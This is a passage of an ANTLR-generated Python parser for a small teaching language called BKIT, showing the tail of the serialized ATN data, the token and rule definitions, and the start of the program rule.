buf.write(\"\\2\\2\\66\\u0143\\3\\2\\2\\28\\u015d\\3\\2\\2\\2:\\u015f\\3\\2\\2\\2<\\u0163\")\n buf.write(\"\\3\\2\\2\\2>\\u0165\\3\\2\\2\\2@\\u017a\\3\\2\\2\\2B\\u018f\\3\\2\\2\\2\")\n buf.write(\"D\\u019f\\3\\2\\2\\2F\\u01a1\\3\\2\\2\\2H\\u01aa\\3\\2\\2\\2J\\u01ae\\3\")\n buf.write(\"\\2\\2\\2L\\u01b2\\3\\2\\2\\2NO\\5\\4\\3\\2OP\\7B\\2\\2PR\\3\\2\\2\\2QN\\3\")\n buf.write(\"\\2\\2\\2RU\\3\\2\\2\\2SQ\\3\\2\\2\\2ST\\3\\2\\2\\2TY\\3\\2\\2\\2US\\3\\2\\2\")\n buf.write(\"\\2VX\\5\\6\\4\\2WV\\3\\2\\2\\2X[\\3\\2\\2\\2YW\\3\\2\\2\\2YZ\\3\\2\\2\\2Z\")\n buf.write(\"\\\\\\3\\2\\2\\2[Y\\3\\2\\2\\2\\\\]\\7\\2\\2\\3]\\3\\3\\2\\2\\2^_\\7\\36\\2\\2\")\n buf.write(\"_`\\7@\\2\\2`a\\5@!\\2a\\5\\3\\2\\2\\2bc\\7\\31\\2\\2cd\\7@\\2\\2dh\\7\\3\")\n buf.write(\"\\2\\2ef\\7\\33\\2\\2fg\\7@\\2\\2gi\\5L\\'\\2he\\3\\2\\2\\2hi\\3\\2\\2\\2\")\n buf.write(\"ij\\3\\2\\2\\2jk\\7\\16\\2\\2kq\\7@\\2\\2lm\\5\\16\\b\\2mn\\7B\\2\\2np\\3\")\n buf.write(\"\\2\\2\\2ol\\3\\2\\2\\2ps\\3\\2\\2\\2qo\\3\\2\\2\\2qr\\3\\2\\2\\2rw\\3\\2\\2\")\n buf.write(\"\\2sq\\3\\2\\2\\2tv\\5\\n\\6\\2ut\\3\\2\\2\\2vy\\3\\2\\2\\2wu\\3\\2\\2\\2w\")\n buf.write(\"x\\3\\2\\2\\2xz\\3\\2\\2\\2yw\\3\\2\\2\\2z{\\7\\25\\2\\2{|\\7A\\2\\2|\\7\\3\")\n buf.write(\"\\2\\2\\2}~\\5\\16\\b\\2~\\177\\7B\\2\\2\\177\\u0081\\3\\2\\2\\2\\u0080\")\n buf.write(\"}\\3\\2\\2\\2\\u0081\\u0084\\3\\2\\2\\2\\u0082\\u0080\\3\\2\\2\\2\\u0082\")\n buf.write(\"\\u0083\\3\\2\\2\\2\\u0083\\u0088\\3\\2\\2\\2\\u0084\\u0082\\3\\2\\2\\2\")\n buf.write(\"\\u0085\\u0087\\5\\n\\6\\2\\u0086\\u0085\\3\\2\\2\\2\\u0087\\u008a\\3\")\n buf.write(\"\\2\\2\\2\\u0088\\u0086\\3\\2\\2\\2\\u0088\\u0089\\3\\2\\2\\2\\u0089\\t\")\n buf.write(\"\\3\\2\\2\\2\\u008a\\u0088\\3\\2\\2\\2\\u008b\\u009f\\5\\f\\7\\2\\u008c\")\n buf.write(\"\\u009f\\5\\20\\t\\2\\u008d\\u009f\\5\\22\\n\\2\\u008e\\u009f\\5\\24\")\n buf.write(\"\\13\\2\\u008f\\u0090\\5\\26\\f\\2\\u0090\\u0091\\7B\\2\\2\\u0091\\u009f\")\n buf.write(\"\\3\\2\\2\\2\\u0092\\u0093\\5\\30\\r\\2\\u0093\\u0094\\7B\\2\\2\\u0094\")\n 
buf.write(\"\\u009f\\3\\2\\2\\2\\u0095\\u0096\\5\\32\\16\\2\\u0096\\u0097\\7B\\2\")\n buf.write(\"\\2\\u0097\\u009f\\3\\2\\2\\2\\u0098\\u0099\\5\\34\\17\\2\\u0099\\u009a\")\n buf.write(\"\\7B\\2\\2\\u009a\\u009f\\3\\2\\2\\2\\u009b\\u009c\\5\\36\\20\\2\\u009c\")\n buf.write(\"\\u009d\\7B\\2\\2\\u009d\\u009f\\3\\2\\2\\2\\u009e\\u008b\\3\\2\\2\\2\")\n buf.write(\"\\u009e\\u008c\\3\\2\\2\\2\\u009e\\u008d\\3\\2\\2\\2\\u009e\\u008e\\3\")\n buf.write(\"\\2\\2\\2\\u009e\\u008f\\3\\2\\2\\2\\u009e\\u0092\\3\\2\\2\\2\\u009e\\u0095\")\n buf.write(\"\\3\\2\\2\\2\\u009e\\u0098\\3\\2\\2\\2\\u009e\\u009b\\3\\2\\2\\2\\u009f\")\n buf.write(\"\\13\\3\\2\\2\\2\\u00a0\\u00a1\\7\\32\\2\\2\\u00a1\\u00a2\\5 \\21\\2\\u00a2\")\n buf.write(\"\\u00a3\\7\\35\\2\\2\\u00a3\\u00ab\\5\\b\\5\\2\\u00a4\\u00a5\\7\\23\\2\")\n buf.write(\"\\2\\u00a5\\u00a6\\5 \\21\\2\\u00a6\\u00a7\\7\\35\\2\\2\\u00a7\\u00a8\")\n buf.write(\"\\5\\b\\5\\2\\u00a8\\u00aa\\3\\2\\2\\2\\u00a9\\u00a4\\3\\2\\2\\2\\u00aa\")\n buf.write(\"\\u00ad\\3\\2\\2\\2\\u00ab\\u00a9\\3\\2\\2\\2\\u00ab\\u00ac\\3\\2\\2\\2\")\n buf.write(\"\\u00ac\\u00b0\\3\\2\\2\\2\\u00ad\\u00ab\\3\\2\\2\\2\\u00ae\\u00af\\7\")\n buf.write(\"\\22\\2\\2\\u00af\\u00b1\\5\\b\\5\\2\\u00b0\\u00ae\\3\\2\\2\\2\\u00b0\")\n buf.write(\"\\u00b1\\3\\2\\2\\2\\u00b1\\u00b2\\3\\2\\2\\2\\u00b2\\u00b3\\7\\24\\2\")\n buf.write(\"\\2\\u00b3\\u00b4\\7A\\2\\2\\u00b4\\r\\3\\2\\2\\2\\u00b5\\u00b6\\5\\4\")\n buf.write(\"\\3\\2\\u00b6\\17\\3\\2\\2\\2\\u00b7\\u00b8\\7\\30\\2\\2\\u00b8\\u00b9\")\n buf.write(\"\\7:\\2\\2\\u00b9\\u00ba\\7\\3\\2\\2\\u00ba\\u00bb\\7D\\2\\2\\u00bb\\u00bc\")\n buf.write(\"\\5 \\21\\2\\u00bc\\u00bd\\7C\\2\\2\\u00bd\\u00be\\5 \\21\\2\\u00be\")\n buf.write(\"\\u00bf\\7C\\2\\2\\u00bf\\u00c0\\5 \\21\\2\\u00c0\\u00c1\\7;\\2\\2\\u00c1\")\n buf.write(\"\\u00c2\\7\\21\\2\\2\\u00c2\\u00c3\\5\\b\\5\\2\\u00c3\\u00c4\\7\\26\\2\")\n buf.write(\"\\2\\u00c4\\u00c5\\7A\\2\\2\\u00c5\\21\\3\\2\\2\\2\\u00c6\\u00c7\\7\\37\")\n buf.write(\"\\2\\2\\u00c7\\u00c8\\5 
\\21\\2\\u00c8\\u00c9\\7\\21\\2\\2\\u00c9\\u00ca\")\n buf.write(\"\\5\\b\\5\\2\\u00ca\\u00cb\\7\\27\\2\\2\\u00cb\\u00cc\\7A\\2\\2\\u00cc\")\n buf.write(\"\\23\\3\\2\\2\\2\\u00cd\\u00ce\\7\\21\\2\\2\\u00ce\\u00cf\\5\\b\\5\\2\\u00cf\")\n buf.write(\"\\u00d0\\7\\37\\2\\2\\u00d0\\u00d1\\5 \\21\\2\\u00d1\\u00d2\\7\\\"\\2\")\n buf.write(\"\\2\\u00d2\\u00d3\\7A\\2\\2\\u00d3\\25\\3\\2\\2\\2\\u00d4\\u00d7\\5.\")\n buf.write(\"\\30\\2\\u00d5\\u00d7\\7\\3\\2\\2\\u00d6\\u00d4\\3\\2\\2\\2\\u00d6\\u00d5\")\n buf.write(\"\\3\\2\\2\\2\\u00d7\\u00d8\\3\\2\\2\\2\\u00d8\\u00d9\\7D\\2\\2\\u00d9\")\n buf.write(\"\\u00da\\5 \\21\\2\\u00da\\27\\3\\2\\2\\2\\u00db\\u00dc\\7\\17\\2\\2\\u00dc\")\n buf.write(\"\\31\\3\\2\\2\\2\\u00dd\\u00de\\7\\20\\2\\2\\u00de\\33\\3\\2\\2\\2\\u00df\")\n buf.write(\"\\u00e0\\7\\3\\2\\2\\u00e0\\u00eb\\7:\\2\\2\\u00e1\\u00e6\\5 \\21\\2\")\n buf.write(\"\\u00e2\\u00e3\\7C\\2\\2\\u00e3\\u00e5\\5 \\21\\2\\u00e4\\u00e2\\3\")\n buf.write(\"\\2\\2\\2\\u00e5\\u00e8\\3\\2\\2\\2\\u00e6\\u00e4\\3\\2\\2\\2\\u00e6\\u00e7\")\n buf.write(\"\\3\\2\\2\\2\\u00e7\\u00ea\\3\\2\\2\\2\\u00e8\\u00e6\\3\\2\\2\\2\\u00e9\")\n buf.write(\"\\u00e1\\3\\2\\2\\2\\u00ea\\u00ed\\3\\2\\2\\2\\u00eb\\u00e9\\3\\2\\2\\2\")\n buf.write(\"\\u00eb\\u00ec\\3\\2\\2\\2\\u00ec\\u00ee\\3\\2\\2\\2\\u00ed\\u00eb\\3\")\n buf.write(\"\\2\\2\\2\\u00ee\\u00ef\\7;\\2\\2\\u00ef\\35\\3\\2\\2\\2\\u00f0\\u00f2\")\n buf.write(\"\\7\\34\\2\\2\\u00f1\\u00f3\\5 \\21\\2\\u00f2\\u00f1\\3\\2\\2\\2\\u00f2\")\n buf.write(\"\\u00f3\\3\\2\\2\\2\\u00f3\\37\\3\\2\\2\\2\\u00f4\\u00f5\\5\\\"\\22\\2\\u00f5\")\n buf.write(\"\\u00f6\\7\\4\\2\\2\\u00f6\\u00f7\\5\\\"\\22\\2\\u00f7\\u00fa\\3\\2\\2\")\n buf.write(\"\\2\\u00f8\\u00fa\\5\\\"\\22\\2\\u00f9\\u00f4\\3\\2\\2\\2\\u00f9\\u00f8\")\n buf.write(\"\\3\\2\\2\\2\\u00fa!\\3\\2\\2\\2\\u00fb\\u00fc\\b\\22\\1\\2\\u00fc\\u00fd\")\n buf.write(\"\\5$\\23\\2\\u00fd\\u0103\\3\\2\\2\\2\\u00fe\\u00ff\\f\\4\\2\\2\\u00ff\")\n 
buf.write(\"\\u0100\\7\\5\\2\\2\\u0100\\u0102\\5$\\23\\2\\u0101\\u00fe\\3\\2\\2\\2\")\n buf.write(\"\\u0102\\u0105\\3\\2\\2\\2\\u0103\\u0101\\3\\2\\2\\2\\u0103\\u0104\\3\")\n buf.write(\"\\2\\2\\2\\u0104#\\3\\2\\2\\2\\u0105\\u0103\\3\\2\\2\\2\\u0106\\u0107\")\n buf.write(\"\\b\\23\\1\\2\\u0107\\u0108\\5&\\24\\2\\u0108\\u010e\\3\\2\\2\\2\\u0109\")\n buf.write(\"\\u010a\\f\\4\\2\\2\\u010a\\u010b\\7\\6\\2\\2\\u010b\\u010d\\5&\\24\\2\")\n buf.write(\"\\u010c\\u0109\\3\\2\\2\\2\\u010d\\u0110\\3\\2\\2\\2\\u010e\\u010c\\3\")\n buf.write(\"\\2\\2\\2\\u010e\\u010f\\3\\2\\2\\2\\u010f%\\3\\2\\2\\2\\u0110\\u010e\")\n buf.write(\"\\3\\2\\2\\2\\u0111\\u0112\\b\\24\\1\\2\\u0112\\u0113\\5(\\25\\2\\u0113\")\n buf.write(\"\\u0119\\3\\2\\2\\2\\u0114\\u0115\\f\\4\\2\\2\\u0115\\u0116\\7\\7\\2\\2\")\n buf.write(\"\\u0116\\u0118\\5(\\25\\2\\u0117\\u0114\\3\\2\\2\\2\\u0118\\u011b\\3\")\n buf.write(\"\\2\\2\\2\\u0119\\u0117\\3\\2\\2\\2\\u0119\\u011a\\3\\2\\2\\2\\u011a\\'\")\n buf.write(\"\\3\\2\\2\\2\\u011b\\u0119\\3\\2\\2\\2\\u011c\\u011d\\7\\b\\2\\2\\u011d\")\n buf.write(\"\\u0120\\5(\\25\\2\\u011e\\u0120\\5*\\26\\2\\u011f\\u011c\\3\\2\\2\\2\")\n buf.write(\"\\u011f\\u011e\\3\\2\\2\\2\\u0120)\\3\\2\\2\\2\\u0121\\u0122\\7\\t\\2\")\n buf.write(\"\\2\\u0122\\u0125\\5*\\26\\2\\u0123\\u0125\\5,\\27\\2\\u0124\\u0121\")\n buf.write(\"\\3\\2\\2\\2\\u0124\\u0123\\3\\2\\2\\2\\u0125+\\3\\2\\2\\2\\u0126\\u0129\")\n buf.write(\"\\5.\\30\\2\\u0127\\u0129\\5\\60\\31\\2\\u0128\\u0126\\3\\2\\2\\2\\u0128\")\n buf.write(\"\\u0127\\3\\2\\2\\2\\u0129-\\3\\2\\2\\2\\u012a\\u012f\\5\\60\\31\\2\\u012b\")\n buf.write(\"\\u012c\\7<\\2\\2\\u012c\\u012d\\5 \\21\\2\\u012d\\u012e\\7=\\2\\2\\u012e\")\n buf.write(\"\\u0130\\3\\2\\2\\2\\u012f\\u012b\\3\\2\\2\\2\\u0130\\u0131\\3\\2\\2\\2\")\n buf.write(\"\\u0131\\u012f\\3\\2\\2\\2\\u0131\\u0132\\3\\2\\2\\2\\u0132/\\3\\2\\2\")\n buf.write(\"\\2\\u0133\\u0136\\5\\66\\34\\2\\u0134\\u0136\\5\\62\\32\\2\\u0135\\u0133\")\n 
buf.write(\"\\3\\2\\2\\2\\u0135\\u0134\\3\\2\\2\\2\\u0136\\61\\3\\2\\2\\2\\u0137\\u013d\")\n buf.write(\"\\5\\64\\33\\2\\u0138\\u0139\\7:\\2\\2\\u0139\\u013a\\5 \\21\\2\\u013a\")\n buf.write(\"\\u013b\\7;\\2\\2\\u013b\\u013d\\3\\2\\2\\2\\u013c\\u0137\\3\\2\\2\\2\")\n buf.write(\"\\u013c\\u0138\\3\\2\\2\\2\\u013d\\63\\3\\2\\2\\2\\u013e\\u0142\\7\\3\")\n buf.write(\"\\2\\2\\u013f\\u0142\\5<\\37\\2\\u0140\\u0142\\5> \\2\\u0141\\u013e\")\n buf.write(\"\\3\\2\\2\\2\\u0141\\u013f\\3\\2\\2\\2\\u0141\\u0140\\3\\2\\2\\2\\u0142\")\n buf.write(\"\\65\\3\\2\\2\\2\\u0143\\u0144\\7\\3\\2\\2\\u0144\\u014f\\7:\\2\\2\\u0145\")\n buf.write(\"\\u014a\\5 \\21\\2\\u0146\\u0147\\7C\\2\\2\\u0147\\u0149\\5 \\21\\2\")\n buf.write(\"\\u0148\\u0146\\3\\2\\2\\2\\u0149\\u014c\\3\\2\\2\\2\\u014a\\u0148\\3\")\n buf.write(\"\\2\\2\\2\\u014a\\u014b\\3\\2\\2\\2\\u014b\\u014e\\3\\2\\2\\2\\u014c\\u014a\")\n buf.write(\"\\3\\2\\2\\2\\u014d\\u0145\\3\\2\\2\\2\\u014e\\u0151\\3\\2\\2\\2\\u014f\")\n buf.write(\"\\u014d\\3\\2\\2\\2\\u014f\\u0150\\3\\2\\2\\2\\u0150\\u0152\\3\\2\\2\\2\")\n buf.write(\"\\u0151\\u014f\\3\\2\\2\\2\\u0152\\u0153\\7;\\2\\2\\u0153\\67\\3\\2\\2\")\n buf.write(\"\\2\\u0154\\u0155\\7<\\2\\2\\u0155\\u0156\\5 \\21\\2\\u0156\\u0157\")\n buf.write(\"\\7=\\2\\2\\u0157\\u015e\\3\\2\\2\\2\\u0158\\u0159\\7<\\2\\2\\u0159\\u015a\")\n buf.write(\"\\5 \\21\\2\\u015a\\u015b\\7=\\2\\2\\u015b\\u015c\\58\\35\\2\\u015c\")\n buf.write(\"\\u015e\\3\\2\\2\\2\\u015d\\u0154\\3\\2\\2\\2\\u015d\\u0158\\3\\2\\2\\2\")\n buf.write(\"\\u015e9\\3\\2\\2\\2\\u015f\\u0160\\7\\3\\2\\2\\u0160\\u0161\\7D\\2\\2\")\n buf.write(\"\\u0161\\u0162\\5> \\2\\u0162;\\3\\2\\2\\2\\u0163\\u0164\\t\\2\\2\\2\")\n buf.write(\"\\u0164=\\3\\2\\2\\2\\u0165\\u0174\\7>\\2\\2\\u0166\\u0169\\5<\\37\\2\")\n buf.write(\"\\u0167\\u0169\\5> \\2\\u0168\\u0166\\3\\2\\2\\2\\u0168\\u0167\\3\\2\")\n buf.write(\"\\2\\2\\u0169\\u0171\\3\\2\\2\\2\\u016a\\u016d\\7C\\2\\2\\u016b\\u016e\")\n buf.write(\"\\5<\\37\\2\\u016c\\u016e\\5> 
\\2\\u016d\\u016b\\3\\2\\2\\2\\u016d\\u016c\")\n buf.write(\"\\3\\2\\2\\2\\u016e\\u0170\\3\\2\\2\\2\\u016f\\u016a\\3\\2\\2\\2\\u0170\")\n buf.write(\"\\u0173\\3\\2\\2\\2\\u0171\\u016f\\3\\2\\2\\2\\u0171\\u0172\\3\\2\\2\\2\")\n buf.write(\"\\u0172\\u0175\\3\\2\\2\\2\\u0173\\u0171\\3\\2\\2\\2\\u0174\\u0168\\3\")\n buf.write(\"\\2\\2\\2\\u0174\\u0175\\3\\2\\2\\2\\u0175\\u0176\\3\\2\\2\\2\\u0176\\u0177\")\n buf.write(\"\\7?\\2\\2\\u0177?\\3\\2\\2\\2\\u0178\\u017b\\5D#\\2\\u0179\\u017b\\5\")\n buf.write(\"B\\\"\\2\\u017a\\u0178\\3\\2\\2\\2\\u017a\\u0179\\3\\2\\2\\2\\u017b\\u0183\")\n buf.write(\"\\3\\2\\2\\2\\u017c\\u017f\\7C\\2\\2\\u017d\\u0180\\5D#\\2\\u017e\\u0180\")\n buf.write(\"\\5B\\\"\\2\\u017f\\u017d\\3\\2\\2\\2\\u017f\\u017e\\3\\2\\2\\2\\u0180\")\n buf.write(\"\\u0182\\3\\2\\2\\2\\u0181\\u017c\\3\\2\\2\\2\\u0182\\u0185\\3\\2\\2\\2\")\n buf.write(\"\\u0183\\u0181\\3\\2\\2\\2\\u0183\\u0184\\3\\2\\2\\2\\u0184A\\3\\2\\2\")\n buf.write(\"\\2\\u0185\\u0183\\3\\2\\2\\2\\u0186\\u018a\\7\\3\\2\\2\\u0187\\u0188\")\n buf.write(\"\\7<\\2\\2\\u0188\\u0189\\7\\n\\2\\2\\u0189\\u018b\\7=\\2\\2\\u018a\\u0187\")\n buf.write(\"\\3\\2\\2\\2\\u018b\\u018c\\3\\2\\2\\2\\u018c\\u018a\\3\\2\\2\\2\\u018c\")\n buf.write(\"\\u018d\\3\\2\\2\\2\\u018d\\u0190\\3\\2\\2\\2\\u018e\\u0190\\7\\3\\2\\2\")\n buf.write(\"\\u018f\\u0186\\3\\2\\2\\2\\u018f\\u018e\\3\\2\\2\\2\\u0190\\u0191\\3\")\n buf.write(\"\\2\\2\\2\\u0191\\u0194\\7D\\2\\2\\u0192\\u0195\\5> \\2\\u0193\\u0195\")\n buf.write(\"\\5<\\37\\2\\u0194\\u0192\\3\\2\\2\\2\\u0194\\u0193\\3\\2\\2\\2\\u0195\")\n buf.write(\"C\\3\\2\\2\\2\\u0196\\u019a\\7\\3\\2\\2\\u0197\\u0198\\7<\\2\\2\\u0198\")\n buf.write(\"\\u0199\\7\\n\\2\\2\\u0199\\u019b\\7=\\2\\2\\u019a\\u0197\\3\\2\\2\\2\")\n buf.write(\"\\u019b\\u019c\\3\\2\\2\\2\\u019c\\u019a\\3\\2\\2\\2\\u019c\\u019d\\3\")\n buf.write(\"\\2\\2\\2\\u019d\\u01a0\\3\\2\\2\\2\\u019e\\u01a0\\7\\3\\2\\2\\u019f\\u0196\")\n 
buf.write(\"\\3\\2\\2\\2\\u019f\\u019e\\3\\2\\2\\2\\u01a0E\\3\\2\\2\\2\\u01a1\\u01a6\")\n buf.write(\"\\7\\3\\2\\2\\u01a2\\u01a3\\7<\\2\\2\\u01a3\\u01a4\\5 \\21\\2\\u01a4\")\n buf.write(\"\\u01a5\\7=\\2\\2\\u01a5\\u01a7\\3\\2\\2\\2\\u01a6\\u01a2\\3\\2\\2\\2\")\n buf.write(\"\\u01a7\\u01a8\\3\\2\\2\\2\\u01a8\\u01a6\\3\\2\\2\\2\\u01a8\\u01a9\\3\")\n buf.write(\"\\2\\2\\2\\u01a9G\\3\\2\\2\\2\\u01aa\\u01ab\\5F$\\2\\u01ab\\u01ac\\7\")\n buf.write(\"D\\2\\2\\u01ac\\u01ad\\5> \\2\\u01adI\\3\\2\\2\\2\\u01ae\\u01af\\7\\3\")\n buf.write(\"\\2\\2\\u01af\\u01b0\\7D\\2\\2\\u01b0\\u01b1\\5<\\37\\2\\u01b1K\\3\\2\")\n buf.write(\"\\2\\2\\u01b2\\u01b7\\5D#\\2\\u01b3\\u01b4\\7C\\2\\2\\u01b4\\u01b6\")\n buf.write(\"\\5D#\\2\\u01b5\\u01b3\\3\\2\\2\\2\\u01b6\\u01b9\\3\\2\\2\\2\\u01b7\\u01b5\")\n buf.write(\"\\3\\2\\2\\2\\u01b7\\u01b8\\3\\2\\2\\2\\u01b8M\\3\\2\\2\\2\\u01b9\\u01b7\")\n buf.write(\"\\3\\2\\2\\2,SYhqw\\u0082\\u0088\\u009e\\u00ab\\u00b0\\u00d6\\u00e6\")\n buf.write(\"\\u00eb\\u00f2\\u00f9\\u0103\\u010e\\u0119\\u011f\\u0124\\u0128\")\n buf.write(\"\\u0131\\u0135\\u013c\\u0141\\u014a\\u014f\\u015d\\u0168\\u016d\")\n buf.write(\"\\u0171\\u0174\\u017a\\u017f\\u0183\\u018c\\u018f\\u0194\\u019c\")\n buf.write(\"\\u019f\\u01a8\\u01b7\")\n return buf.getvalue()\n\n\nclass BKITParser ( Parser ):\n\n grammarFileName = \"BKIT.g4\"\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n sharedContextCache = PredictionContextCache()\n\n literalNames = [ \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"'Body'\", \"'Break'\", \"'Continue'\", \"'Do'\", \"'Else'\", \n \"'ElseIf'\", \"'EndIf'\", \"'EndBody'\", \"'EndFor'\", \"'EndWhile'\", \n \"'For'\", \"'Function'\", \"'If'\", \"'Parameter'\", \"'Return'\", \n \"'Then'\", \"'Var'\", \"'While'\", \"'True'\", 
\"'False'\", \n \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \"'-.'\", \"'*'\", \"'*.'\", \n \"'\\\\'\", \"'\\\\.'\", \"'%'\", \"'!'\", \"'&&'\", \"'||'\", \"'=='\", \n \"'!='\", \"'<'\", \"'>'\", \"'<='\", \"'>='\", \"'=/='\", \"'<.'\", \n \"'>.'\", \"'<=.'\", \"'>=.'\", \"'('\", \"')'\", \"'['\", \"']'\", \n \"'{'\", \"'}'\", \"':'\", \"'.'\", \"';'\", \"','\", \"'='\", \"'\\\"'\", \n \"'int_of_float'\", \"'int_of_string'\", \"'float_to_int'\", \n \"'float_of_string'\", \"'bool_of_string'\", \"'string_of_bool'\", \n \"'string_of_int'\", \"'string_of_float'\" ]\n\n symbolicNames = [ \"<INVALID>\", \"ID\", \"REL_OP\", \"BIN_LOGICAL_OP\", \"ADD_OP\", \n \"MUL_OP\", \"UN_LOGICAL_OP\", \"UN_OP\", \"INT_LIT\", \"FLOAT_LIT\", \n \"BOOL_LIT\", \"STRING_LIT\", \"BODY\", \"BREAK\", \"CONTINUE\", \n \"DO\", \"ELSE\", \"ELSEIF\", \"ENDIF\", \"ENDBODY\", \"ENDFOR\", \n \"ENDWHILE\", \"FOR\", \"FUNCTION\", \"IF\", \"PARAMETER\", \n \"RETURN\", \"THEN\", \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \n \"ENDDO\", \"PLUS_INT\", \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \n \"STAR_INT\", \"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \n \"MOD\", \"NOT\", \"AND\", \"OR\", \"EQUAL\", \"NOT_EQUAL_INT\", \n \"LESS_INT\", \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \"GREATER_OR_EQUAL_INT\", \n \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \n \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \n \"RIGHT_PAREN\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \n \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \"ASSIGN\", \n \"DOUBLE_QUOTE\", \"INT_OF_FLOAT\", \"INT_OF_STRING\", \"FLOAT_TO_INT\", \n \"FLOAT_OF_STRING\", \"BOOL_OF_STRING\", \"STRING_OF_BOOL\", \n \"STRING_OF_INT\", \"STRING_OF_FLOAT\", \"COMMENT\", \"WS\", \n \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"UNTERMINATED_COMMENT\", \n \"ERROR_CHAR\" ]\n\n RULE_program = 0\n RULE_var_declare = 1\n RULE_function_declare = 2\n RULE_stmt_list = 3\n RULE_stmt = 4\n RULE_if_stmt = 5\n 
RULE_var_declare_stmt = 6\n RULE_for_stmt = 7\n RULE_while_stmt = 8\n RULE_dowhile_stmt = 9\n RULE_assign_stmt = 10\n RULE_break_stmt = 11\n RULE_continue_stmt = 12\n RULE_call_stmt = 13\n RULE_return_stmt = 14\n RULE_expr = 15\n RULE_expr1 = 16\n RULE_expr2 = 17\n RULE_expr3 = 18\n RULE_expr4 = 19\n RULE_expr5 = 20\n RULE_expr6 = 21\n RULE_array_cell = 22\n RULE_expr7 = 23\n RULE_expr8 = 24\n RULE_operand = 25\n RULE_function_call = 26\n RULE_index_op = 27\n RULE_array = 28\n RULE_primitive_data = 29\n RULE_array_lit = 30\n RULE_var_list = 31\n RULE_var_init = 32\n RULE_var_non_init = 33\n RULE_composite_var = 34\n RULE_composite_init = 35\n RULE_primitive_init = 36\n RULE_params_list = 37\n\n ruleNames = [ \"program\", \"var_declare\", \"function_declare\", \"stmt_list\", \n \"stmt\", \"if_stmt\", \"var_declare_stmt\", \"for_stmt\", \"while_stmt\", \n \"dowhile_stmt\", \"assign_stmt\", \"break_stmt\", \"continue_stmt\", \n \"call_stmt\", \"return_stmt\", \"expr\", \"expr1\", \"expr2\", \n \"expr3\", \"expr4\", \"expr5\", \"expr6\", \"array_cell\", \"expr7\", \n \"expr8\", \"operand\", \"function_call\", \"index_op\", \"array\", \n \"primitive_data\", \"array_lit\", \"var_list\", \"var_init\", \n \"var_non_init\", \"composite_var\", \"composite_init\", \"primitive_init\", \n \"params_list\" ]\n\n EOF = Token.EOF\n ID=1\n REL_OP=2\n BIN_LOGICAL_OP=3\n ADD_OP=4\n MUL_OP=5\n UN_LOGICAL_OP=6\n UN_OP=7\n INT_LIT=8\n FLOAT_LIT=9\n BOOL_LIT=10\n STRING_LIT=11\n BODY=12\n BREAK=13\n CONTINUE=14\n DO=15\n ELSE=16\n ELSEIF=17\n ENDIF=18\n ENDBODY=19\n ENDFOR=20\n ENDWHILE=21\n FOR=22\n FUNCTION=23\n IF=24\n PARAMETER=25\n RETURN=26\n THEN=27\n VAR=28\n WHILE=29\n TRUE=30\n FALSE=31\n ENDDO=32\n PLUS_INT=33\n PLUS_FLOAT=34\n MINUS_INT=35\n MINUS_FLOAT=36\n STAR_INT=37\n STAR_FLOAT=38\n DIV_INT=39\n DIV_FLOAT=40\n MOD=41\n NOT=42\n AND=43\n OR=44\n EQUAL=45\n NOT_EQUAL_INT=46\n LESS_INT=47\n GREATER_INT=48\n LESS_OR_EQUAL_INT=49\n GREATER_OR_EQUAL_INT=50\n 
NOT_EQUAL_FLOAT=51\n LESS_FLOAT=52\n GREATER_FLOAT=53\n LESS_OR_EQUAL_FLOAT=54\n GREATER_OR_EQUAL_FLOAT=55\n LEFT_PAREN=56\n RIGHT_PAREN=57\n LEFT_BRACKET=58\n RIGHT_BRACKET=59\n LEFT_BRACE=60\n RIGHT_BRACE=61\n COLON=62\n DOT=63\n SEMI=64\n COMMA=65\n ASSIGN=66\n DOUBLE_QUOTE=67\n INT_OF_FLOAT=68\n INT_OF_STRING=69\n FLOAT_TO_INT=70\n FLOAT_OF_STRING=71\n BOOL_OF_STRING=72\n STRING_OF_BOOL=73\n STRING_OF_INT=74\n STRING_OF_FLOAT=75\n COMMENT=76\n WS=77\n ILLEGAL_ESCAPE=78\n UNCLOSE_STRING=79\n UNTERMINATED_COMMENT=80\n ERROR_CHAR=81\n\n def __init__(self, input:TokenStream, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)\n self._predicates = None\n\n\n\n\n class ProgramContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def EOF(self):\n return self.getToken(BKITParser.EOF, 0)\n\n def var_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declareContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def function_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Function_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Function_declareContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_program\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterProgram\" ):\n listener.enterProgram(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitProgram\" ):\n listener.exitProgram(self)\n\n\n\n\n def program(self):\n\n localctx = BKITParser.ProgramContext(self, 
